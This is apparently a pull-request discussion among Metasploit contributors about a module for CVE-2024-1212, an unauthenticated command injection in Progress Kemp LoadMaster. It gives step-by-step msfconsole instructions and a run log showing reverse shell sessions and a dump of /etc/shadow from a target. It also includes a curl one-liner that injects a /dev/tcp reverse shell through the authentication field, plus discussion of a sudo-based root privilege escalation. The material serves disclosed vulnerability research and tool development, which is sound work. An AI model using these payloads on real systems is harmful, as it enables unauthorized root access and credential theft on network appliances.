Progress LoadMaster unauthenticated command injection module CVE-2024-1212

[DaveYesland]

Verification

For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212

The AWS marketplace (https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw) has free trials which can be used by deploying a version before 7.2.59.2 (7.2.59.0). These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.

To enable sessions management:

1. Log into the admin portal at: https://LM-IP:8443/
2. Go to Certificates & Security > Admin WUI Access > "Enable Session Management"
3. Log out, refresh and try the exploit.

With privesc:

1. Install the application
2. Start msfconsole
3. Do: use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection
4. Do: set RHOSTS <target loadmaster>
5. Do: set RPORT <port loadmaster is running on>
6. Do: set LHOST <your host IP>
7. Do: run
8. You should get a root shell.

Without privesc:

1. Install the application
2. Start msfconsole
3. Do: use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection
4. Do: set PRIVESC false
5. Do: set RHOSTS <target loadmaster>
6. Do: set RPORT <port loadmaster is running on>
7. Do: set LHOST <your host IP>
8. Do: run
9. You should get a shell as the "bal" user.

Example demonstration:

msf6 > use exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection
[*] Using configured payload cmd/linux/https/x64/shell/reverse_tcp
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set RPORT 8443
RPORT => 8443
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set RHOSTS 18.207.251.125
RHOSTS => 18.207.251.125
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set LHOST ******
LHOST => ******
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > exploit

[*] Started reverse TCP handler on *****:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 18.207.251.125:8443 is vulnerable...
[+] The target is vulnerable.
[*] Sending payload...
[*] Sending stage (38 bytes) to 18.207.251.125
[*] Sending stage (38 bytes) to 18.207.251.125
[*] Executing privilege escalation command...
[-] Detected a session initiated too close to the first session. Terminating it.
[*] 18.207.251.125 - Command shell session 2 closed.
[*] Executing privilege escalation command...
[*] Command shell session 2 opened (*****:4444 -> 18.207.251.125:12652) at 2024-03-18 18:34:50 +0000

[-] Invalid session identifier: 2
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > sessions -i 1
[*] Starting interaction with 1...

[*] Command shell session 1 opened (*****:4444 -> 18.207.251.125:12648) at 2024-03-18 18:35:10 +0000
cat /.mnt/patch_name /etc/shadow
7.2.59.0.22007.RELEASE
root:*:11449:0:10000::::
bin:*:8902:0:10000::::
daemon:*:8902:0:10000::::
nobody:*:0:0:10000::::
sshd:*:0:0:10000::::

[bwatters-r7]

OK, so CVE-2024-1212 is a command injection vulnerability, but what about the priv esc? Your blog says Once command execution is obtained, it is possible to escalate privileges to root from the default admin “bal” user by abusing sudo entries, granting full control of the device. I cannot find a matching method overwriting loadkeys for sudo abuse, but it looks like a configuration issue, so I'm assuming it is not considered a new vulnerability?

[DaveYesland]

OK, so CVE-2024-1212 is a command injection vulnerability, but what about the priv esc? Your blog says Once command execution is obtained, it is possible to escalate privileges to root from the default admin “bal” user by abusing sudo entries, granting full control of the device. I cannot find a matching method overwriting loadkeys for sudo abuse, but it looks like a configuration issue, so I'm assuming it is not considered a new vulnerability?

Yeah this is just one method. The bal user is considered an admin user and can run several commands with sudo including changing any users password. I used the method I chose in this module just because it avoids any permanent changes like changing the root password.

[bwatters-r7]

When I go to the loadmaster website, the only download is 7.2.59.2, which after install is 7.2.59.2.22338, and is patched against this vuln. I'm happy to create a trail account to get a license, but is there anywhere I can download the vulnerable VM?

[DaveYesland]

Currently the only way I know to get the vulnerable version is via the AWS marketplace:

The AWS marketplace (https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw) has free trials which can be used by deploying a version before 7.2.59.2 (7.2.59.0). These require the "session management" to be enabled in order for the exploit to work. Since by default in AWS the admin WUI is behind basic auth.

To enable sessions management:

1. Log into the admin portal at: https://LM-IP:8443/
2. Go to Certificates & Security > Admin WUI Access > "Enable Session Management"
3. Log out, refresh and try the exploit.

[wvu]

I'm happy to send the VM.

[bwatters-r7]

I'm happy to send the VM.

@wvu You rock; let me know how.

[wvu]

@bwatters-r7 I pinged you on the hellsite!

[bwatters-r7]

OK; I got the software; thanks @wvu ! I was also able to modify the priv esc section to work with Meterpreter or shell sessions and added in logic to force the payload to only launch once using fetch payloads. I need to verify that the logic works across all cmd payloads and run it by some others because some of what I did to get the payload changed is a bit odd on the Metasploit Framework side.

[bwatters-r7]

Out of curiosity, do we know if that priv esc works on the latest release? I'm happy to test on my own, but the diagnostic shell does not have sudo or loadkeys. Alternatively, if there's a way to drop into a real shell, I'm check if it was patched myself.

[DaveYesland]

@wvu found a much cleaner way to get a root shell: https://x.com/wvuuuuuuuuuuuuu/status/1770728321166278885?s=20 Still would need to test it in the module but probably better to just use this method on the initial command injection, remove the complexity of the privesc altogether.

curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1'

[wvu]

rsync was also another good option!

[bwatters-r7]

@wvu found a much cleaner way to get a root shell: https://x.com/wvuuuuuuuuuuuuu/status/1770728321166278885?s=20 Still would need to test it in the module but probably better to just use this method on the initial command injection, remove the complexity of the privesc altogether.

curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1'

This will get a root shell via CVE-2024-1212 on v7.2.59.0.22007; I'm asking/trying to figure out if the separate priv esc technique of copying bash to loadkeys still works on v7.2.59.2.22338. I can't use the exploit to get a shell because it is patched. Basically, if that priv esc technique works on versions that CVE-2024-1212 does not, we should split this into 2 modules.

[DaveYesland]

I was able to check root privescs on 7.2.59.2.22338, which is not vulnerable to CVE-2024-1212. The sudo entries and other privescs still exist.

[bwatters-r7]

I was able to check root privescs on 7.2.59.2.22338, which is not vulnerable to CVE-2024-1212. The sudo entries and other privescs still exist.

Thank you! If that's the case, we really should split this into 2 modules. I'm happy to split it up and do a PR to this PR since you've already put a lot of work into it, but I don't want to get in your way if it is something you'd like to pursue. Let me know if I should do it, or if you'd like to do it. Since I'll base it off of your work, even if I do the work to split it, you will remain a contributor and main author of the modules.

[DaveYesland]

No problem having you take that if you already have a plan to split them.

[bwatters-r7]

I don't want anyone to think I've forgotten about this. I've got the exploit working great with prepend to enforce the "run once" flag, and I'm nearly there on the separate priv esc module. I'll PR to this branch for the exploit, and open a new PR for the priv esc. Thanks for your patience, @DaveYesland

[bwatters-r7]

Wow; sorry this took so long! https://github.com/DaveYesland/metasploit-framework/pull/1

[DaveYesland]

Awesome looks good! Is there anything else needed from me here?

[bwatters-r7]

Awesome looks good! Is there anything else needed from me here?

Yes; if the changes are good with you, please merge them into your branch. After that, I'll get another contributor to approve them, and I can land this branch to the main branch. If you are really busy and/or are uninterested in landing my PR to your branch, I can close this PR and PR my branch to the main branch and close this PR. It would result in the PR going under my name rather than yours, though. I think I could probably also do a force push of the changes to this branch, but the easiest and best way is for you to merge my PR to your branch.

[bwatters-r7]

Release Notes

This adds a module targeting CVE-2024-1212, an unauthenticated command injection vulnerability in Kemp Progress Loadmaster versions after 7.2.48.1, but patched in 7.2.59.2 (GA), 7.2.54.8 (LTSF) and 7.2.48.10 (LTS).